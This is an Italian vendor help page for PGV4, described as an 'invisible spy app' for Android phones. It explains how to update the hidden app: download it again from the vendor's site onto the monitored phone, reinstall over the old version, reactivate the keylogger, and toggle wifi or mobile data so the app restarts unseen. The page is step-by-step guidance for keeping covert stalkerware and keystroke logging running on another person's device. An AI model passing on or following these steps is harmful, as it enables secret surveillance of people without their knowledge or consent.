GuideAggiornare PGV4

Come si aggiorna l'app spia invisibile se già installata sul telefono.

 

Quando si installa l'app spia invisibile su un telefono Android, la stessa è sul telefono invisibile. Nella sezione home -> Aggiornamenti, potrete trovare la data ed il motivo dell'ultimo aggiornamento. Se in un aggiornamento vengono inserite nuove funzionalità, occorre, se possibile aggiornare l'app PGV4 per poter usufruire di esse. Non occorre disinstallare l'app dal telefono in cui è installata, basta semplicemente ripetere la procedura d'installazione, la vecchia versione verrà sovrascritta.

 

 

Corretto aggiornamento dell'app

  • Dal browser del telefono digitare nella barra degli indirizzi x.pgv4.com
  • Scaricare l'app e lanciare il setup d'installazione, al termine premi fatto, fine.
  • Eccezioni: Se clicchi installa e non funziona, vuol dire che il telefono ha terminato la memoria disponibile. Libera quindi memoria e ripeti da capo la procedura.

 

 

La procedura da seguire è la stessa dell'installazione.

 

 

Aggiornamento terminato

  • Dopo aver premuto installa ed essere andati avanti accettando tutte le condizioni, ci ritroviamo dinnanzi ad una videata simile a quella sotto riportata. A differenza dell'installazione, questa volta, per aggiornare, il bottone Apri non sarà cliccabile. Per terminare e sufficiente premere il bottone di fianco Fatto, come da figura di sotto.

 

 

Sarà necessario a questo punto attivare il keylogger. ed avrai terminato.

 

Dopo aver installato l'aggiornamento è necessario spegnare e accendere il wifi o in alternativa spegnare e accendere la rete mobile. Questo serve a far ripartire PGV4 che è stato fermato per l'aggiornamento. In ogni caso PGV4 ripartirà anche ad altri eventi, come ad esempio la ricezione di una chiamata o la ricezione di un sms.

 

Se riscontrate difficoltà nell'aggiornare l'app PGV4, disinstallare PGV4 e poi reinstallare.

Giudichi utile il contenuto?

Come possiamo migliorare?

Grazie per aver espresso la tua opinione.